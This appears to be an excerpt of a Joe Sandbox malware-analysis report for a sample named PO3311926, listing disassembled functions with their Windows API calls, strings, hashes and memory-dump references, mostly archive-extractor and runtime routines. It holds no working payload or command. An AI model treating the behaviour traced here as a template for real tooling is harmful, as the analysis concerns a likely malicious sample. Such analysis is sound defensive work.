Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 55beee85095c1c59ea830d99f2b1b361ed91b9902337fe1a758030066e34e0aa
Instruction ID: 60bbfc545caa09ca13aa312d4d2a5c94d07aac98d86f998c667d703d5eab758b
Opcode Fuzzy Hash: 55beee85095c1c59ea830d99f2b1b361ed91b9902337fe1a758030066e34e0aa
Instruction Fuzzy Hash: 8D418F3124C381ABD731DF24DC55FEEBBE4AB86700F040999B5D193291DBA49A48DB63

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BA112B
_wcslen.LIBCMT ref: 00BA1153
_wcslen.LIBCMT ref: 00BA1182
_wcslen.LIBCMT ref: 00BA11A9

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 164d4395b2f442ff1e38e66ccc5a5d312cb8190f8d4e80f01eb9cc7140547cc1
Instruction ID: ed33a53bf65ef98706569202e6abf1a6b74b6c85c76dfa372d02189523c44c49
Opcode Fuzzy Hash: 164d4395b2f442ff1e38e66ccc5a5d312cb8190f8d4e80f01eb9cc7140547cc1
Instruction Fuzzy Hash: F641B47190166A5BCB619F688C45BEF7BFCEF01710F004459F946F7241DA70AE458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00BC47C6,00000000,00000000,00BC57FB,?,00BC57FB,?,00000001,00BC47C6,2DE85006,00000001,00BC57FB,00BC57FB), ref: 00BCC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BCCA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BCCA70
__freea.LIBCMT ref: 00BCCA79

Part of subcall function 00BC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC4286,?,0000015D,?,?,?,?,00BC5762,000000FF,00000000,?,?), ref: 00BC8E38

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 3799894ae917b15333ab0078b5ae459000102dfd5c3b76fa2e7b7563c097c249
Instruction ID: eff7a5b07b8c088208f6d345f5afd61556e779953817862b6543ed05b4c691c0
Opcode Fuzzy Hash: 3799894ae917b15333ab0078b5ae459000102dfd5c3b76fa2e7b7563c097c249
Instruction Fuzzy Hash: 6E31AD72A0020AABDB25DF64CC95EBE7BE5EB11710B1442ADFC08E7255EB35CD50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00BBA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00BBA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BBA683
ReleaseDC.USER32(00000000,00000000), ref: 00BBA691

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 9fa7425f18894e7b91610f06af8941848ed2fcef86c8c81bcc15354dbb9098ab
Instruction ID: 89ea97328e4c43c1df56557bb82aef46e6bed3b9de7a631e5ce7766e9b75ee1e
Opcode Fuzzy Hash: 9fa7425f18894e7b91610f06af8941848ed2fcef86c8c81bcc15354dbb9098ab
Instruction Fuzzy Hash: CCE0EC71943BA1ABD3615B60AD4DB8F3E68EB05B57F024101FA099A2D0DB648600CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00BBA699: GetDC.USER32(00000000), ref: 00BBA69D
Part of subcall function 00BBA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BBA6A8
Part of subcall function 00BBA699: ReleaseDC.USER32(00000000,00000000), ref: 00BBA6B3

GetObjectW.GDI32(?,00000018,?), ref: 00BBA83C

Part of subcall function 00BBAAC9: GetDC.USER32(00000000), ref: 00BBAAD2
Part of subcall function 00BBAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00BBAB01
Part of subcall function 00BBAAC9: ReleaseDC.USER32(00000000,?), ref: 00BBAB99

Strings

(, xrefs: 00BBA9AA

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: b48e50693cab91723ab4eb83e60c065af21c1e1f23a058b54a03bb0112ed69b2
Instruction ID: 071b6ddc19967f5b8d7fc14eb62ee84c90d6ca436904dde79f542914d4b4cff7
Opcode Fuzzy Hash: b48e50693cab91723ab4eb83e60c065af21c1e1f23a058b54a03bb0112ed69b2
Instruction Fuzzy Hash: 4A91E0B1A08350AFD610DF25D894A6BBBE8FFC8701F00495EF59AD3260DB70A945CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BCB324

Part of subcall function 00BC9097: IsProcessorFeaturePresent.KERNEL32(00000017,00BC9086,00000000,00BC8D94,00000000,00000000,00000000,00000016,?,?,00BC9093,00000000,00000000,00000000,00000000,00000000), ref: 00BC9099
Part of subcall function 00BC9097: GetCurrentProcess.KERNEL32(C0000417,00BC8D94,00000000,?,00000003,00BC9868), ref: 00BC90BB
Part of subcall function 00BC9097: TerminateProcess.KERNEL32(00000000,?,00000003,00BC9868), ref: 00BC90C2

Strings

., xrefs: 00BCB4DB
*?, xrefs: 00BCB1FB

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction ID: 7183a8a3a257e160e760e9fcd80e3d08e8d246d17a5f0f0f20f9480e014c6f97
Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction Fuzzy Hash: 49514F71E0010AAFDF14DFA8C882EADBBF5EF98314F2581ADE855E7341E7359A018B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BA75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA75E3

Part of subcall function 00BB05DA: _wcslen.LIBCMT ref: 00BB05E0

Part of subcall function 00BAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BAA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA777F

Part of subcall function 00BAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA501
Part of subcall function 00BAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA532

Strings

:, xrefs: 00BA7654

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 59d1a56971c3865bee41dad9459326e9ab653e830abde93f2cf0d45d72758c77
Instruction ID: 4951655c9614ab97bd2f52fb209a94d1ea5622bf10f8392f671981fb18ef2fff
Opcode Fuzzy Hash: 59d1a56971c3865bee41dad9459326e9ab653e830abde93f2cf0d45d72758c77
Instruction Fuzzy Hash: 3A414371809158AAEB35EB64CC96EEEB3F8EF56300F0040D6B605A2192DB745F85DF71

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BBB4E3
_wcslen.LIBCMT ref: 00BBB4FE

Strings

}, xrefs: 00BBB4D6

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: f90671e469abb412a32c9b2d056fc0ca598369925bdbca16a454e458424e3df3
Instruction ID: 0b99f081a0440993f42be5b728c31742629bd54c39ba737984f7afea524dcbbc
Opcode Fuzzy Hash: f90671e469abb412a32c9b2d056fc0ca598369925bdbca16a454e458424e3df3
Instruction Fuzzy Hash: 18219D7290421A5BD731AA64D855FBAB3ECEFA1760F5404AAF540C2242EBE5D94883B3

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDDA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(0001042E), ref: 00BBDDDC
DialogBoxParamW.USER32(GETPASSWORD1,0001042E,00BBB270,?,?), ref: 00BBDE18

Strings

GETPASSWORD1, xrefs: 00BBDE0D

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: DialogParamVisibleWindow
String ID: GETPASSWORD1
API String ID: 3157717868-3292211884
Opcode ID: b05803520d115d677962a405fb14eea6f64f7f3db8059b314da7775b66253d6e
Instruction ID: f5b46a947fbe4b2b699ca5c9f8f745a3215b4c589b63fc1e3f7e643a17a55d8e
Opcode Fuzzy Hash: b05803520d115d677962a405fb14eea6f64f7f3db8059b314da7775b66253d6e
Instruction Fuzzy Hash: 2D112632204184ABDF129A34AC42BFF3BE8EB06310F1440E5B949AB191DBF4EC44C760

Uniqueness

Uniqueness Score: -1.00%

Function 00BAF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00BAF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BAF2E4
Part of subcall function 00BAF2C5: GetProcAddress.KERNEL32(00BE81C8,CryptUnprotectMemory), ref: 00BAF2F4

GetCurrentProcessId.KERNEL32(?,?,?,00BAF33E), ref: 00BAF3D2

Strings

CryptProtectMemory failed, xrefs: 00BAF389
CryptUnprotectMemory failed, xrefs: 00BAF3CA

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 6ff9825dde3e649f72d061d5f955b8ad7ce7f0b836e331818d37feac9d861f48
Instruction ID: 553132d608e95fac02830f961857e65d25e4fcaae9969a200f29f464b56d54e9
Opcode Fuzzy Hash: 6ff9825dde3e649f72d061d5f955b8ad7ce7f0b836e331818d37feac9d861f48
Instruction Fuzzy Hash: BD1136316096266BDF119F61DC416BE77D4EF06B20B0440E6FC056F292EE309D018796

Uniqueness

Uniqueness Score: -1.00%

Function 00BAB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BAB9B8

Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5

Strings

%c:\, xrefs: 00BAB9AE

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: fe06050fca997d1a7e43048a73d1c8620b59f02c99c838046b2af881262b893f
Instruction ID: c1d0a436a9eaf405344e1a251c74c721b09c1339dc14081cc08e853cae82e61d
Opcode Fuzzy Hash: fe06050fca997d1a7e43048a73d1c8620b59f02c99c838046b2af881262b893f
Instruction Fuzzy Hash: A201D263508312699A306B759C82E6BABECEE93770B40849FF5A4D6183FB30D84482B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BC97E5: GetLastError.KERNEL32(?,00BE1098,00BC4674,00BE1098,?,?,00BC40EF,?,?,00BE1098), ref: 00BC97E9
Part of subcall function 00BC97E5: _free.LIBCMT ref: 00BC981C
Part of subcall function 00BC97E5: SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC985D
Part of subcall function 00BC97E5: _abort.LIBCMT ref: 00BC9863

_abort.LIBCMT ref: 00BCBB80
_free.LIBCMT ref: 00BCBBB4

Strings

0"V, xrefs: 00BCBBBA, 00BCBBC2

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: 0"V
API String ID: 289325740-4270886499
Opcode ID: a6362421a11db6b6577218b4627a5f3e9aacf1f2043363d29752fa0b976dc18c
Instruction ID: aa56039eea4b92d5f1adbab9adfda88f8045f140005314f4921ac3b1a5392441
Opcode Fuzzy Hash: a6362421a11db6b6577218b4627a5f3e9aacf1f2043363d29752fa0b976dc18c
Instruction Fuzzy Hash: D801AD35D026229BCB21AF688802F6DF7E0FB08B20F1501DEE8246B295DF61AD018FC1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00BAE2E8: _swprintf.LIBCMT ref: 00BAE30E
Part of subcall function 00BAE2E8: _strlen.LIBCMT ref: 00BAE32F
Part of subcall function 00BAE2E8: SetDlgItemTextW.USER32(?,00BDE274,?), ref: 00BAE38F
Part of subcall function 00BAE2E8: GetWindowRect.USER32(?,?), ref: 00BAE3C9
Part of subcall function 00BAE2E8: GetClientRect.USER32(?,?), ref: 00BAE3D5

GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370

Strings

0, xrefs: 00BA1319

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 9c58e17c88b331bf482ecfa8ec811eb81eb5510b1d67d7090cac6ab061481918
Instruction ID: 33361c4be382bbef9f6f6783b8b989500dd04975f0ed2d813e4085c2ce6bcbf2
Opcode Fuzzy Hash: 9c58e17c88b331bf482ecfa8ec811eb81eb5510b1d67d7090cac6ab061481918
Instruction Fuzzy Hash: D7F0AF30109388BADF550F698C0DBEE3BECEF46345F048994FC44505A2CB74CA90EA28

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00BB1101,?,?,00BB117F,?,?,?,?,?,00BB1169), ref: 00BB0FEA
GetLastError.KERNEL32(?,?,00BB117F,?,?,?,?,?,00BB1169), ref: 00BB0FF6

Part of subcall function 00BA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00BB0FFF

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 5b04ce1b18531fcf2a88546d298c6ea4f539f971f4951733f12f4b7d11698209
Instruction ID: d378c5c1343902192c074b58fab19cd28ac7d3253c7303c50eb06a93be9e1435
Opcode Fuzzy Hash: 5b04ce1b18531fcf2a88546d298c6ea4f539f971f4951733f12f4b7d11698209
Instruction Fuzzy Hash: 51D02B7250C12037C61033285C15D7EBA84CB12731B640B95F038622F3EF2009814292

Uniqueness

Uniqueness Score: -1.00%

Function 00BAE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00BADA55,?), ref: 00BAE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00BADA55,?), ref: 00BAE2B1

Strings

RTL, xrefs: 00BAE2AB

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 1333bf7e3a9706debbc130cfea6962a6c5f38a92583c1b0db76f92653582094f
Instruction ID: 2059a1787f21f93f72a89ffd2a5df15a59737fe02833d0bcbecda5bd0207b41a
Opcode Fuzzy Hash: 1333bf7e3a9706debbc130cfea6962a6c5f38a92583c1b0db76f92653582094f
Instruction Fuzzy Hash: EDC0123124571066E63427646C1DB47ABD85B01F11F05049EB141EA2D2EAA5C54087A1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sdadbtvsh.binPID: 3232, Parent PID: 6052COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	68

Executed Functions

Function 00595D78 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00595DA7

Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA

GetCurrentProcess.KERNEL32(?,0062DC2C,00000000,?,?), ref: 00595ED3
IsWow64Process.KERNEL32(00000000,?,?), ref: 00595EDA
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00595F05
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00595F17
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00595F25
FreeLibrary.KERNEL32(00000000,?,?), ref: 00595F2C
GetSystemInfo.KERNEL32(?,?,?), ref: 00595F51

Strings

|O, xrefs: 005D4F80
GetNativeSystemInfo, xrefs: 00595F11
kernel32.dll, xrefs: 00595F00

